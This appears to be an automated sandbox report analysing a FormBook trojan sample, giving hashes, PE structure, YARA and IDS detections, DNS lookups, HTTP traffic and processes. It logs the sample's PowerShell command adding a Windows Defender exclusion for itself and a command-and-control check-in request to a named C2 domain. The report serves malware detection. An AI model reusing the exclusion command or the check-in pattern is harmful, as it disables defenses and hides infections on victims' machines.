                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2232
                                                                                                                            Entropy (8bit):5.380046556058007
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:tWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//YUyus:tLHxv2IfLZ2KRH6Oug8s
                                                                                                                            MD5:2628E843EF7060E91426823B102E13AA
                                                                                                                            SHA1:6FE0AD465404E6929BFEBA2D4F397D8F2D295CE1
                                                                                                                            SHA-256:4DC6B06D7934D36877120520E8EA2999A08349B2124C51B6444F52FC6C388C85
                                                                                                                            SHA-512:CD405D5274DB025437B70CDD2643D751431FFA83EE5BB84415F71B8F2B82EDDD0FD87BB5A77D9DDF6C198FC8193248975BE629BED5E32C0A63C6593C5F0222DF
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bncjccy.cef.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5d0szuis.42b.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imbxe0cm.kcw.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wuf42kmt.f3j.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Entropy (8bit):7.799582218853214
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                            File name:JHnNxt6Pnb.exe
                                                                                                                            File size:635'904 bytes
                                                                                                                            MD5:b631685c5ef9ee26ded25c76ab3eda27
                                                                                                                            SHA1:03696b36c4838440cf8def9687117745c9edbd19
                                                                                                                            SHA256:a6d2a47171f9630a8db62eb4001e196dfbad94cf40638e108cc649883d1bc069
                                                                                                                            SHA512:62fe2308ad1490495ec283027e2f07c7d5179ba9a327791de0b98a5f29db4ea3c721d3866674cedcb4033153ff5515d7f5bdc17d547191519dba70cd1c483134
                                                                                                                            SSDEEP:12288:tLczRLw1+27aPipUXT8eseyW2dv1WlYpXJk1jJT8CWqpqJ4uSYGExH0z:dctLw1+AaPOUXIjew1Umsj+0q2
                                                                                                                            TLSH:D3D4F1D87215F4AEC4538BB14874EE765A343EBAA217C30381E75CAB790D697DE102F2
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o..g..............0.............^.... ........@.. ....................................`................................

                                                                                                                            File Icon

                                                                                                                            Icon Hash:01242c66198d8d9e

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x49ba5e
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x670AE76F [Sat Oct 12 21:17:35 2024 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x9ba100x4b.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x13a0.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x9e0000xc.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x20000x99a640x99c00be55bf2e9e280d2759c908e85fe5a30dFalse0.8994188262195122data7.807750703003363IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0x9c0000x13a00x1400e6e1a46e2c1d1b6262c84cfc4cc295e5False0.778125data7.024635237638305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0x9e0000xc0x200eb1a0df1f0664d173adda81cda7b0d58False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_ICON0x9c0e80xf91PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8936010037641154
                                                                                                                            RT_GROUP_ICON0x9d07c0x14data1.05
                                                                                                                            RT_VERSION0x9d0900x30cdata0.4307692307692308

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                            Network Behavior

                                                                                                                            Suricata IDS Alerts

                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2024-12-05T16:50:25.171196+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.84971685.13.166.1880TCP
                                                                                                                            2024-12-05T16:50:25.171196+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.84971685.13.166.1880TCP
                                                                                                                            2024-12-05T16:50:25.171196+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.84971685.13.166.1880TCP

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 5, 2024 16:50:24.067549944 CET4971680192.168.2.885.13.166.18
                                                                                                                            Dec 5, 2024 16:50:24.187494040 CET804971685.13.166.18192.168.2.8
                                                                                                                            Dec 5, 2024 16:50:24.187576056 CET4971680192.168.2.885.13.166.18
                                                                                                                            Dec 5, 2024 16:50:24.187833071 CET4971680192.168.2.885.13.166.18
                                                                                                                            Dec 5, 2024 16:50:24.307676077 CET804971685.13.166.18192.168.2.8
                                                                                                                            Dec 5, 2024 16:50:24.682780981 CET4971680192.168.2.885.13.166.18
                                                                                                                            Dec 5, 2024 16:50:24.843650103 CET804971685.13.166.18192.168.2.8
                                                                                                                            Dec 5, 2024 16:50:25.171139002 CET804971685.13.166.18192.168.2.8
                                                                                                                            Dec 5, 2024 16:50:25.171195984 CET4971680192.168.2.885.13.166.18

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 5, 2024 16:50:02.859833956 CET5908353192.168.2.81.1.1.1
                                                                                                                            Dec 5, 2024 16:50:03.078313112 CET53590831.1.1.1192.168.2.8
                                                                                                                            Dec 5, 2024 16:50:23.105048895 CET5842153192.168.2.81.1.1.1
                                                                                                                            Dec 5, 2024 16:50:24.066509962 CET53584211.1.1.1192.168.2.8
                                                                                                                            Dec 5, 2024 16:50:43.949125051 CET6373053192.168.2.81.1.1.1
                                                                                                                            Dec 5, 2024 16:50:44.165515900 CET53637301.1.1.1192.168.2.8
                                                                                                                            Dec 5, 2024 16:51:05.280121088 CET4985053192.168.2.81.1.1.1
                                                                                                                            Dec 5, 2024 16:51:05.570362091 CET53498501.1.1.1192.168.2.8
                                                                                                                            Dec 5, 2024 16:51:25.902410030 CET5068653192.168.2.81.1.1.1
                                                                                                                            Dec 5, 2024 16:51:26.132848978 CET53506861.1.1.1192.168.2.8
                                                                                                                            Dec 5, 2024 16:51:46.326582909 CET6168253192.168.2.81.1.1.1
                                                                                                                            Dec 5, 2024 16:51:46.551973104 CET53616821.1.1.1192.168.2.8
                                                                                                                            Dec 5, 2024 16:52:06.902546883 CET5911053192.168.2.81.1.1.1
                                                                                                                            Dec 5, 2024 16:52:07.129349947 CET53591101.1.1.1192.168.2.8
                                                                                                                            Dec 5, 2024 16:52:27.621648073 CET6545553192.168.2.81.1.1.1
                                                                                                                            Dec 5, 2024 16:52:27.846096992 CET53654551.1.1.1192.168.2.8
                                                                                                                            Dec 5, 2024 16:52:48.919939041 CET5001353192.168.2.81.1.1.1
                                                                                                                            Dec 5, 2024 16:52:49.204158068 CET53500131.1.1.1192.168.2.8
                                                                                                                            Dec 5, 2024 16:53:09.760350943 CET5634653192.168.2.81.1.1.1
                                                                                                                            Dec 5, 2024 16:53:10.035132885 CET53563461.1.1.1192.168.2.8
                                                                                                                            Dec 5, 2024 16:53:31.855633974 CET5375753192.168.2.81.1.1.1
                                                                                                                            Dec 5, 2024 16:53:32.157536030 CET53537571.1.1.1192.168.2.8

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Dec 5, 2024 16:50:02.859833956 CET192.168.2.81.1.1.10xb62bStandard query (0)www.inn-paaaa.buzzA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:50:23.105048895 CET192.168.2.81.1.1.10xa8bdStandard query (0)www.irex.infoA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:50:43.949125051 CET192.168.2.81.1.1.10x647Standard query (0)www.yzq0n.topA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:51:05.280121088 CET192.168.2.81.1.1.10xb2ffStandard query (0)www.siabgc4d.onlineA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:51:25.902410030 CET192.168.2.81.1.1.10x7ba4Standard query (0)www.48372305.topA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:51:46.326582909 CET192.168.2.81.1.1.10x591dStandard query (0)www.77179ksuhr.topA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:52:06.902546883 CET192.168.2.81.1.1.10x1c6cStandard query (0)www.f6b-crxy.topA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:52:27.621648073 CET192.168.2.81.1.1.10x7e0dStandard query (0)www.azino-forum-pro.onlineA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:52:48.919939041 CET192.168.2.81.1.1.10x9e71Standard query (0)www.68716329.xyzA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:53:09.760350943 CET192.168.2.81.1.1.10x229Standard query (0)www.apita.topA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:53:31.855633974 CET192.168.2.81.1.1.10x8e0cStandard query (0)www.oldsteps.buzzA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Dec 5, 2024 16:50:03.078313112 CET1.1.1.1192.168.2.80xb62bName error (3)www.inn-paaaa.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:50:24.066509962 CET1.1.1.1192.168.2.80xa8bdNo error (0)www.irex.info85.13.166.18A (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:50:44.165515900 CET1.1.1.1192.168.2.80x647Name error (3)www.yzq0n.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:51:05.570362091 CET1.1.1.1192.168.2.80xb2ffName error (3)www.siabgc4d.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:51:26.132848978 CET1.1.1.1192.168.2.80x7ba4Name error (3)www.48372305.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:51:46.551973104 CET1.1.1.1192.168.2.80x591dName error (3)www.77179ksuhr.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:52:07.129349947 CET1.1.1.1192.168.2.80x1c6cName error (3)www.f6b-crxy.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:52:27.846096992 CET1.1.1.1192.168.2.80x7e0dName error (3)www.azino-forum-pro.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:52:49.204158068 CET1.1.1.1192.168.2.80x9e71Name error (3)www.68716329.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:53:10.035132885 CET1.1.1.1192.168.2.80x229Name error (3)www.apita.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 5, 2024 16:53:32.157536030 CET1.1.1.1192.168.2.80x8e0cName error (3)www.oldsteps.buzznonenoneA (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • www.irex.info

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.84971685.13.166.18804084C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 5, 2024 16:50:24.187833071 CET168OUTGET /cu29/?MvvxBDN=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOM4azueTiHl&Bjk=7nwDmBCH2DD0oHhP HTTP/1.1
                                                                                                                            Host: www.irex.info
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:


                                                                                                                            Code Manipulations

                                                                                                                            User Modules

                                                                                                                            Hook Summary

                                                                                                                            Function NameHook TypeActive in Processes
                                                                                                                            PeekMessageAINLINEexplorer.exe
                                                                                                                            PeekMessageWINLINEexplorer.exe
                                                                                                                            GetMessageWINLINEexplorer.exe
                                                                                                                            GetMessageAINLINEexplorer.exe

                                                                                                                            Processes

                                                                                                                            Process: explorer.exe, Module: user32.dll
                                                                                                                            Function NameHook TypeNew Data
                                                                                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE6
                                                                                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE6
                                                                                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE6
                                                                                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE6

                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:10:49:19
                                                                                                                            Start date:05/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\JHnNxt6Pnb.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\JHnNxt6Pnb.exe"
                                                                                                                            Imagebase:0x670000
                                                                                                                            File size:635'904 bytes
                                                                                                                            MD5 hash:B631685C5EF9EE26DED25C76AB3EDA27
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:10:49:20
                                                                                                                            Start date:05/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
                                                                                                                            Imagebase:0xc60000
                                                                                                                            File size:433'152 bytes
                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:4
                                                                                                                            Start time:10:49:20
                                                                                                                            Start date:05/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\JHnNxt6Pnb.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\JHnNxt6Pnb.exe"
                                                                                                                            Imagebase:0xfb0000
                                                                                                                            File size:635'904 bytes
                                                                                                                            MD5 hash:B631685C5EF9EE26DED25C76AB3EDA27
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:5
                                                                                                                            Start time:10:49:20
                                                                                                                            Start date:05/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:6
                                                                                                                            Start time:10:49:21
                                                                                                                            Start date:05/12/2024
                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\Explorer.EXE
